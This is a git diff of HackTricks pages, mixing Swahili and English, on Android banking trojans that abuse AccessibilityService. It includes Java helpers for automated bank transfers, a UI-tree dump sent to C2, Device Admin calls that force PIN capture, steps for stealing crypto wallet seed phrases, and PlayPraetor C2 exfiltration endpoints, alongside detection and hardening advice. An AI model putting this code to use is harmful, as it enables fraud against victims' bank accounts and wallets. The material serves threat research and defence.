{
|
||||
"cmd": "transfer",
|
||||
"receiver_address": "ACME s.r.o.",
|
||||
"account": "123456789/0100",
|
||||
"amount": "24500.00",
|
||||
"name": "ACME"
|
||||
}
|
||||
```
|
||||
Mifano ya maandishi yaliyoonekana katika mtiririko mmoja wa lengo (CZ → EN):
|
||||
- "Nová platba" → "Malipo mapya"
|
||||
- "Zadat platbu" → "Ingiza malipo"
|
||||
- "Nový příjemce" → "Mpokeaji mpya"
|
||||
- "Domácí číslo účtu" → "Nambari ya akaunti ya ndani"
|
||||
- "Další" → "Ifuatayo"
|
||||
- "Odeslat" → "Tuma"
|
||||
- "Ano, pokračovat" → "Ndiyo, endelea"
|
||||
- "Zaplatit" → "Lipa"
|
||||
- "Hotovo" → "Imekamilika"
|
||||
|
||||
Waendeshaji pia wanaweza kuangalia/kuongeza vizingiti vya uhamisho kupitia amri kama `check_limit` na `limit` ambazo zinaelekeza kwenye UI ya vizingiti kwa njia sawa.
|
||||
|
||||
### Crypto wallet seed extraction
|
||||
Malengo kama MetaMask, Trust Wallet, Blockchain.com, Phantom. Mtiririko: fungua (PIN iliyopelewa au nywila iliyotolewa), nenda kwenye Security/Recovery, funua/onyesha seed phrase, keylog/exfiltrate it. Tekeleza locale-aware selectors (EN/RU/CZ/SK) ili kusawazisha urambazaji kati ya lugha.
|
||||
|
||||
### Device Admin coercion
|
||||
Device Admin APIs zinatumika kuongeza fursa za kunasa PIN na kumkasirisha mhusika:
|
||||
|
||||
- Kufunga mara moja:
|
||||
```java
|
||||
dpm.lockNow();
|
||||
```
|
||||
- Sababisha uthibitisho uliopo uishe ili kulazimisha kubadilisha (Accessibility inakamata PIN/nenosiri mpya):
|
||||
```java
|
||||
dpm.setPasswordExpirationTimeout(admin, 1L); // requires admin / often owner
|
||||
```
|
||||
- Lazimisha ufunguaji usiotumia biometria kwa kuzima vipengele vya biometria vya keyguard:
|
||||
```java
|
||||
dpm.setKeyguardDisabledFeatures(admin,
|
||||
DevicePolicyManager.KEYGUARD_DISABLE_FINGERPRINT |
|
||||
DevicePolicyManager.KEYGUARD_DISABLE_TRUST_AGENTS);
|
||||
```
|
||||
Kumbuka: Mifumo mingi ya DevicePolicyManager inahitaji Device Owner/Profile Owner kwenye Android za hivi karibuni; baadhi ya builds za OEM zinaweza kuwa na udhaifu. Daima thibitisha kwenye OS/OEM lengwa.
|
||||
|
||||
### NFC relay orchestration (NFSkate)
|
||||
Stage-3 inaweza kusakinisha na kuanzisha module ya nje ya NFC-relay (mfano, NFSkate) na hata kumpa kiolezo cha HTML kumwongoza mwathiriwa wakati wa relay. Hii inawezesha contactless card-present cash-out pamoja na ATS mtandaoni.
|
||||
|
||||
Muktadha: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay).
|
||||
|
||||
### Operator command set (sample)
|
||||
- UI/state: `txt_screen`, `screen_live`, `display`, `record`
|
||||
- Social: `send_push`, `Facebook`, `WhatsApp`
|
||||
- Overlays: `overlay` (inline HTML), `block` (URL), `block_off`, `access_tint`
|
||||
- Wallets: `metamask`, `trust`, `blockchain`, `phantom`
|
||||
- ATS: `transfer`, `check_limit`, `limit`
|
||||
- Device: `lock`, `expire_password`, `disable_keyguard`, `home`, `back`, `recents`, `power`, `touch`, `swipe`, `keypad`, `tint`, `sound_mode`, `set_sound`
|
||||
- Comms/Recon: `update_device`, `send_sms`, `replace_buffer`, `get_name`, `add_contact`
|
||||
- NFC: `nfs`, `nfs_inject`
|
||||
|
||||
### Mawazo ya kugundua & ulinzi (mtindo wa RatOn)
|
||||
- Tafuta WebViews zenye `addJavascriptInterface()` zinazoonyesha njia za installer/permission; kurasa zinazoisha kwa “/access” zinazochochea prompts za Accessibility.
|
||||
- Toa tahadhari kwa apps zinazozalisha mwendo wa juu wa vitendo/vibonye vya Accessibility muda mfupi baada ya huduma kupewa ruhusa; telemetry inayofanana na Accessibility node dumps ikitumwa kwa C2.
|
||||
- Angalia mabadiliko ya sera za Device Admin katika apps zisizotumika: `lockNow`, kuisha kwa password, kugeuza vipengele vya keyguard.
|
||||
- Taarifu kuhusu prompts za MediaProjection kutoka kwa apps zisizo za kampuni na kufuatiliwa na uplodi za fremu kwa vipindi.
|
||||
- Gundua usakinishaji/kuanzishwa kwa app ya nje ya NFC-relay iliyoamshwa na app nyingine.
|
||||
- Kwa benki: itekeleze uthibitisho wa nje-ya-bandwidth, kufunga kwa biometrics, na mipaka ya miamala isiyoweza kupitishwa na uendeshaji wa kiotomatiki kwenye kifaa.
|
||||
|
||||
## References
|
||||
|
||||
- [The Dark Side of Romance: SarangTrap Extortion Campaign](https://zimperium.com/blog/the-dark-side-of-romance-sarangtrap-extortion-campaign)
|
||||
- [Luban – Android image compression library](https://github.com/Curzibn/Luban)
|
||||
- [Android Malware Promises Energy Subsidy to Steal Financial Data (McAfee Labs)](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/android-malware-promises-energy-subsidy-to-steal-financial-data/)
|
||||
- [Firebase Cloud Messaging — Docs](https://firebase.google.com/docs/cloud-messaging)
|
||||
- [The Rise of RatOn: From NFC heists to remote control and ATS (ThreatFabric)](https://www.threatfabric.com/blogs/the-rise-of-raton-from-nfc-heists-to-remote-control-and-ats)
|
||||
- [GhostTap/NFSkate – NFC relay cash-out tactic (ThreatFabric)](https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
@ -2,23 +2,23 @@
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
## Overview
|
||||
## Muhtasari
|
||||
|
||||
`AccessibilityService` iliumbwa kusaidia watumiaji wenye ulemavu kuingiliana na vifaa vya Android. Kwa bahati mbaya, APIs hizi za **automatisering yenye nguvu** (urambazaji wa kimataifa, uandishi wa maandiko, usambazaji wa ishara, madirisha ya overlay…) zinaweza kutumika na malware kupata **udhibiti kamili wa mbali** wa simu _bila ruhusa za root_.
|
||||
`AccessibilityService` iliumbwa kusaidia watumiaji wenye ulemavu kuingiliana na vifaa vya Android. Kwa bahati mbaya, ile ile **powerful automation APIs** (global navigation, text input, gesture dispatch, overlay windows…) zinaweza kutumiwa na malware kupata **complete remote control** ya kifaa _without root privileges_.
|
||||
|
||||
Trojan za benki za kisasa za Android na Trojan za Upatikanaji wa Mbali (RATs) kama **PlayPraetor, SpyNote, BrasDex, SOVA, ToxicPanda** na wengine wengi wanafuata mapishi sawa:
|
||||
Trojans za kisasa za benki za Android na Remote-Access-Trojans (RATs) kama **PlayPraetor, SpyNote, BrasDex, SOVA, ToxicPanda** na zingine nyingi hufuata taratibu zile zile:
|
||||
|
||||
1. Mtu wa kijamii amshawishi mwathirika kuwezesha huduma ya upatikanaji isiyo halali (ruhusa ya *BIND_ACCESSIBILITY_SERVICE* inachukuliwa kuwa "hatari kubwa" na inahitaji hatua wazi kutoka kwa mtumiaji).
|
||||
2. Tumia huduma hiyo ili
|
||||
* kukamata kila tukio la UI na maandiko yanayoonekana kwenye skrini,
|
||||
* kuingiza ishara za bandia (`dispatchGesture`) na vitendo vya kimataifa (`performGlobalAction`) ili automatishe kazi yoyote anayotaka opereta,
|
||||
* kuchora overlays za skrini nzima juu ya programu halali kwa kutumia aina ya dirisha **TYPE_ACCESSIBILITY_OVERLAY** (hakuna onyo la `SYSTEM_ALERT_WINDOW`!),
|
||||
* kimya kimya kutoa ruhusa za ziada za wakati wa kukimbia kwa kubofya kwenye mazungumzo ya mfumo kwa niaba ya mwathirika.
|
||||
3. Kutolea data au kufanya **On-Device-Fraud (ODF)** kwa wakati halisi wakati mtumiaji anatazama skrini ambayo ni ya kawaida kabisa.
|
||||
1. Social-engineer mwathirika ili aweze kuwasha rogue accessibility service (uruhusa *BIND_ACCESSIBILITY_SERVICE* unachukuliwa kuwa "high-risk" na unahitaji hatua ya wazi ya mtumiaji).
|
||||
2. Tumia service hiyo ili
|
||||
* capture kila tukio la UI na maandishi yanayoonekana kwenye skrini,
|
||||
* inject synthetic gestures (`dispatchGesture`) na global actions (`performGlobalAction`) ili ku-automate kazi yoyote inayotaka operator,
|
||||
* draw full-screen overlays juu ya apps halali kwa kutumia window type **TYPE_ACCESSIBILITY_OVERLAY** (hakuna sehemu ya `SYSTEM_ALERT_WINDOW` inayoonekana!),
|
||||
* silently grant ruhusa za runtime za ziada kwa kubofya dialog za mfumo kwa niaba ya mwathirika.
|
||||
3. Exfiltrate data au kufanya **On-Device-Fraud (ODF)** kwa wakati halisi huku mtumiaji akiangalia skrini inayonekana kawaida kabisa.
|
||||
|
||||
---
|
||||
|
||||
## Requesting the permission
|
||||
## Kuomba ruhusa
|
||||
```xml
|
||||
<!-- AndroidManifest.xml -->
|
||||
<service
|
||||
@ -34,7 +34,7 @@ android:exported="false">
|
||||
android:resource="@xml/evil_accessibility_config"/>
|
||||
</service>
|
||||
```
|
||||
XML ya mshirika inaelezea jinsi mazungumzo ya uwongo yatakavyokuwa:
|
||||
XML ya mwenzake inaelezea jinsi dirisha la mazungumzo la bandia litakavyoonekana:
|
||||
```xml
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<accessibility-service xmlns:android="http://schemas.android.com/apk/res/android"
|
||||
@ -47,7 +47,7 @@ android:canRetrieveWindowContent="true"/>
|
||||
```
|
||||
---
|
||||
|
||||
## Msingi wa automatisering ya UI ya mbali
|
||||
## Misingi ya uendeshaji otomatiki wa UI kwa mbali
|
||||
```java
|
||||
public class EvilService extends AccessibilityService {
|
||||
@Override
|
||||
@ -68,17 +68,17 @@ dispatchGesture(new GestureDescription.Builder().addStroke(s).build(), null, nul
|
||||
}
|
||||
}
|
||||
```
|
||||
Kwa kutumia APIs hizi mbili tu, mshambuliaji anaweza:
|
||||
* Kufungua skrini, kufungua programu ya benki, kuhamasisha mti wa UI wake na kuwasilisha fomu ya uhamisho.
|
||||
* Kukubali kila sanduku la ruhusa linalojitokeza.
|
||||
* Kuweka/update APK za ziada kupitia dhamira ya Play Store.
|
||||
Kwa kutumia API hizi mbili tu mshambuliaji anaweza:
|
||||
* Fungua skrini, fungua app ya benki, pita kupitia UI tree yake na tuma fomu ya uhamisho.
|
||||
* Kubali kila dialogi ya ruhusa inayojitokeza.
|
||||
* Sakinisha/sasisha APK za ziada kupitia Play Store intent.
|
||||
|
||||
---
|
||||
|
||||
## Mifumo ya Unyanyasaji
|
||||
## Mifano ya matumizi mabaya
|
||||
|
||||
### 1. Ulaghai wa Overlay (Kukusanya Taarifa za Utambulisho)
|
||||
`WebView` ya uwazi au isiyo ya uwazi inaongezwa kwenye meneja wa dirisha:
|
||||
### 1. Overlay Phishing (Credential Harvesting)
|
||||
A transparent or opaque `WebView` is added to the window manager:
|
||||
```java
|
||||
WindowManager.LayoutParams lp = new WindowManager.LayoutParams(
|
||||
MATCH_PARENT, MATCH_PARENT,
|
||||
@ -87,59 +87,146 @@ FLAG_NOT_FOCUSABLE | FLAG_NOT_TOUCH_MODAL, // touches still reach the real
|
||||
PixelFormat.TRANSLUCENT);
|
||||
wm.addView(phishingView, lp);
|
||||
```
|
||||
Mtu waathirika anaandika taarifa za kuingia kwenye fomu ya uwongo wakati programu ya nyuma inapokea ishara hizo hizo – hakuna onyo la "draw over other apps" linaloonekana.
|
||||
The victim types credentials into the fake form while the background app receives the same gestures – no suspicious "draw over other apps" prompt is ever shown.
|
||||
|
||||
> Mfano wa kina: sehemu ya *Accessibility Overlay Phishing* ndani ya ukurasa wa Tapjacking.
|
||||
> Detailed example: the *Accessibility Overlay Phishing* section inside the Tapjacking page.
|
||||
|
||||
### 2. Uhalifu wa Otomatiki kwenye Kifaa
|
||||
Familia za malware kama **PlayPraetor** zinaweka channel ya WebSocket inayodumu ambapo opereta anaweza kutoa amri za kiwango cha juu (`init`, `update`, `alert_arr`, `report_list`, …). Huduma hiyo inatafsiri amri hizo kuwa ishara za kiwango cha chini hapo juu, ikifanikisha shughuli zisizoidhinishwa za wakati halisi ambazo kwa urahisi hupita uthibitishaji wa hatua nyingi uliofungwa kwa kifaa hicho.
|
||||
### 2. On-Device Fraud automation
|
||||
Malware families such as **PlayPraetor** maintain a persistent WebSocket channel where the operator can issue high-level commands (`init`, `update`, `alert_arr`, `report_list`, …). The service translates those commands into the low-level gestures above, achieving real-time unauthorized transactions that easily bypass multi-factor-authentication tied to that very device.
|
||||
|
||||
### 3. Utiririshaji wa Skrini & Ufuatiliaji
|
||||
Kwa kuunganisha **MediaProjection API** na maktaba ya mteja wa RTMP, RAT inaweza kutangaza framebuffer ya moja kwa moja kwa `rtmp://<c2>:1935/live/<device_id>`, ikimpa mpinzani ufahamu kamili wa hali wakati injini ya Accessibility inasababisha UI.
|
||||
### 3. Screen streaming & monitoring
|
||||
By combining the **MediaProjection API** with an RTMP client library, the RAT can broadcast the live framebuffer to `rtmp://<c2>:1935/live/<device_id>`, giving the adversary perfect situational awareness while the Accessibility engine drives the UI.
|
||||
|
||||
---
|
||||
|
||||
## PlayPraetor – mtiririko wa amri & udhibiti
|
||||
## PlayPraetor – command & control workflow
|
||||
|
||||
1. **HTTP(S) heartbeat** – piga duru kwenye orodha iliyoandikwa kwa mkono hadi kikoa kimoja kijibu `POST /app/searchPackageName` na C2 inayofanya kazi.
|
||||
2. **WebSocket (bandari 8282)** – amri za JSON za pande mbili:
|
||||
* `update` – peleka mipangilio mipya/APKs
|
||||
* `alert_arr` – tengeneza templeti za overlay
|
||||
* `report_list` – tuma orodha ya majina ya pakiti yaliyolengwa
|
||||
1. **HTTP(S) heartbeat** – iterate over a hard-coded list until one domain answers `POST /app/searchPackageName` with the active C2.
|
||||
2. **WebSocket (port 8282)** – bidirectional JSON commands:
|
||||
* `update` – push new conf/APKs
|
||||
* `alert_arr` – configure overlay templates
|
||||
* `report_list` – send list of targeted package names
|
||||
* `heartbeat_web` – keep-alive
|
||||
3. **RTMP (bandari 1935)** – utiririshaji wa skrini/video wa moja kwa moja.
|
||||
3. **RTMP (port 1935)** – live screen/video streaming.
|
||||
4. **REST exfiltration** –
|
||||
* `/app/saveDevice` (alama ya kidole)
|
||||
* `/app/saveDevice` (fingerprint)
|
||||
* `/app/saveContacts` | `/app/saveSms` | `/app/uploadImageBase64`
|
||||
* `/app/saveCardPwd` (taarifa za benki)
|
||||
* `/app/saveCardPwd` (bank creds)
|
||||
|
||||
**AccessibilityService** ni injini ya ndani inayogeuza amri hizo za wingu kuwa mwingiliano wa kimwili.
|
||||
The **AccessibilityService** is the local engine that turns those cloud commands into physical interactions.
|
||||
|
||||
---
|
||||
|
||||
## Kugundua huduma za upatikanaji zenye uharibifu
|
||||
## Detecting malicious accessibility services
|
||||
|
||||
* `adb shell settings get secure enabled_accessibility_services`
|
||||
* Mipangilio → Upatikanaji → *Huduma zilizopakuliwa* – angalia programu ambazo **sio** kutoka Google Play.
|
||||
* Mifumo ya MDM / EMM inaweza kutekeleza `ACCESSIBILITY_ENFORCEMENT_DEFAULT_DENY` (Android 13+) kuzuia huduma zilizopakuliwa.
|
||||
* Changanua huduma zinazofanya kazi:
|
||||
* Settings → Accessibility → *Downloaded services* – angalia programu ambazo **sio** kutoka Google Play.
|
||||
* MDM / EMM solutions can enforce `ACCESSIBILITY_ENFORCEMENT_DEFAULT_DENY` (Android 13+) to block sideloaded services.
|
||||
* Analyse running services:
|
||||
```bash
|
||||
adb shell dumpsys accessibility | grep "Accessibility Service"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Mapendekezo ya kuimarisha kwa waendelezaji wa programu
|
||||
## Hardening recommendations for app developers
|
||||
|
||||
* Alama maoni nyeti kwa `android:accessibilityDataSensitive="accessibilityDataPrivateYes"` (API 34+).
|
||||
* Changanya `setFilterTouchesWhenObscured(true)` na `FLAG_SECURE` ili kuzuia utekaji wa tap/overlay.
|
||||
* Gundua overlays kwa kupiga kura `WindowManager.getDefaultDisplay().getFlags()` au API ya `ViewRootImpl`.
|
||||
* Kata kufanya kazi wakati `Settings.canDrawOverlays()` **au** huduma ya Upatikanaji isiyoaminika inafanya kazi.
|
||||
* Mark sensitive views with `android:accessibilityDataSensitive="accessibilityDataPrivateYes"` (API 34+).
|
||||
* Combine `setFilterTouchesWhenObscured(true)` with `FLAG_SECURE` to prevent tap/overlay hijacking.
|
||||
* Detect overlays by polling `WindowManager.getDefaultDisplay().getFlags()` or the `ViewRootImpl` API.
|
||||
* Refuse to operate when `Settings.canDrawOverlays()` **or** a non-trusted Accessibility service is active.
|
||||
|
||||
---
|
||||
|
||||
## Marejeleo
|
||||
## ATS automation cheat-sheet (Accessibility-driven)
|
||||
Malware can fully automate a bank app with only Accessibility APIs. Generic primitives:
|
||||
```java
|
||||
// Helpers inside your AccessibilityService
|
||||
private List<AccessibilityNodeInfo> byText(String t){
|
||||
AccessibilityNodeInfo r = getRootInActiveWindow();
|
||||
return r == null ? Collections.emptyList() : r.findAccessibilityNodeInfosByText(t);
|
||||
}
|
||||
private boolean clickText(String t){
|
||||
for (AccessibilityNodeInfo n: byText(t)){
|
||||
if (n.isClickable()) return n.performAction(ACTION_CLICK);
|
||||
AccessibilityNodeInfo p = n.getParent();
|
||||
if (p != null) return p.performAction(ACTION_CLICK);
|
||||
}
|
||||
return false;
|
||||
}
|
||||
private void inputText(AccessibilityNodeInfo field, String text){
|
||||
Bundle b = new Bundle(); b.putCharSequence(ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE, text);
|
||||
field.performAction(ACTION_SET_TEXT, b);
|
||||
}
|
||||
private void tap(float x, float y){
|
||||
Path p = new Path(); p.moveTo(x,y);
|
||||
dispatchGesture(new GestureDescription.Builder()
|
||||
.addStroke(new GestureDescription.StrokeDescription(p,0,40)).build(), null, null);
|
||||
}
|
||||
```
|
||||
Mfano wa mtiririko (Czech → English labels):
|
||||
- "Nová platba" (Malipo mapya) → bonyeza
|
||||
- "Zadat platbu" (Weka malipo) → bonyeza
|
||||
- "Nový příjemce" (Mpokeaji mpya) → bonyeza
|
||||
- "Domácí číslo účtu" (Nambari ya akaunti ya ndani) → zingatia and `ACTION_SET_TEXT`
|
||||
- "Další" (Ifuatayo) → bonyeza → … "Zaplatit" (Lipa) → bonyeza → ingiza PIN
|
||||
|
||||
Mbinu ya dharura: kuratibu zilizowekwa (hard-coded) kwa `dispatchGesture` wakati utafutaji wa maandishi unashindwa kutokana na widgets maalum.
|
||||
|
||||
Imeonekana pia: hatua za awali za `check_limit` na `limit` kwa kuvinjari kiolesura cha mipaka na kuongeza mipaka ya kila siku kabla ya uhamisho.
|
||||
|
||||
## Utoaji wa skrini bandia unaotegemea maandishi
|
||||
Kwa udhibiti wa mbali wenye latency ndogo, badala ya mtiririko kamili wa video, tengeneza uwakilishi wa maandishi wa mti wa UI wa sasa na uitume kwa C2 kwa mfululizo.
|
||||
```java
|
||||
private void dumpTree(AccessibilityNodeInfo n, String indent, StringBuilder sb){
|
||||
if (n==null) return;
|
||||
Rect b = new Rect(); n.getBoundsInScreen(b);
|
||||
CharSequence txt = n.getText(); CharSequence cls = n.getClassName();
|
||||
sb.append(indent).append("[").append(cls).append("] ")
|
||||
.append(txt==null?"":txt).append(" ")
|
||||
.append(b.toShortString()).append("\n");
|
||||
for (int i=0;i<n.getChildCount();i++) dumpTree(n.getChild(i), indent+" ", sb);
|
||||
}
|
||||
```
|
||||
Hii ni msingi wa amri kama `txt_screen` (za mara moja) na `screen_live` (zinazoendelea).
|
||||
|
||||
## Misingi ya kulazimisha Device Admin
|
||||
Mara tu Device Admin receiver inapowezeshwa, miito hii inaongeza fursa za kunasa credentials na kudumisha udhibiti:
|
||||
```java
|
||||
DevicePolicyManager dpm = (DevicePolicyManager) getSystemService(DEVICE_POLICY_SERVICE);
|
||||
ComponentName admin = new ComponentName(this, AdminReceiver.class);
|
||||
|
||||
// 1) Immediate lock
|
||||
dpm.lockNow();
|
||||
|
||||
// 2) Force credential change (expire current PIN/password)
|
||||
dpm.setPasswordExpirationTimeout(admin, 1L); // may require owner/profile-owner on recent Android
|
||||
|
||||
// 3) Disable biometric unlock to force PIN/pattern entry
|
||||
int flags = DevicePolicyManager.KEYGUARD_DISABLE_FINGERPRINT |
|
||||
DevicePolicyManager.KEYGUARD_DISABLE_TRUST_AGENTS;
|
||||
dpm.setKeyguardDisabledFeatures(admin, flags);
|
||||
```
|
||||
Kumbuka: upatikanaji halisi wa sera hizi hutofautiana kulingana na toleo la Android na OEM; thibitisha device policy role (admin vs owner) wakati wa upimaji.
|
||||
|
||||
## Mifumo ya uchimbaji wa seed-phrase za pochi za Crypto
|
||||
Mtiririko uliobainika kwa MetaMask, Trust Wallet, Blockchain.com na Phantom:
|
||||
- Fungua kwa kutumia PIN iliyodukuliwa (iliyorekodiwa kupitia overlay/Accessibility) au nenosiri la pochi lililotolewa.
|
||||
- Sogelea: Settings → Security/Recovery → Reveal/Show recovery phrase.
|
||||
- Chukua phrase kupitia keylogging ya text nodes, secure-screen bypass, au screenshot OCR wakati maandishi yamefichika.
|
||||
- Saidia maeneo mengi (EN/RU/CZ/SK) ili kusawazisha selectors – pendelea `viewIdResourceName` inapopatikana, vinginevyo tumia ulinganishaji wa maandishi wa lugha nyingi.
|
||||
|
||||
## Uendeshaji wa NFC-relay
|
||||
Moduli za Accessibility/RAT zinaweza kusakinisha na kuanzisha app maalum ya NFC-relay (e.g., NFSkate) kama hatua ya tatu na hata kuingiza mwongozo wa overlay ili kumuelekeza mwathirika kupitia hatua za relay za kadi zilizopo.
|
||||
|
||||
Historia na TTPs: https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay
|
||||
|
||||
---
|
||||
|
||||
## Marejeo
|
||||
* [PlayPraetor’s evolving threat: How Chinese-speaking actors globally scale an Android RAT](https://www.cleafy.com/cleafy-labs/playpraetors-evolving-threat-how-chinese-speaking-actors-globally-scale-an-android-rat)
|
||||
* [Android accessibility documentation – Automating UI interaction](https://developer.android.com/guide/topics/ui/accessibility/service)
|
||||
* [The Rise of RatOn: From NFC heists to remote control and ATS (ThreatFabric)](https://www.threatfabric.com/blogs/the-rise-of-raton-from-nfc-heists-to-remote-control-and-ats)
|
||||
* [GhostTap/NFSkate – NFC relay cash-out tactic (ThreatFabric)](https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
Loading…
x
Reference in New Issue
Block a user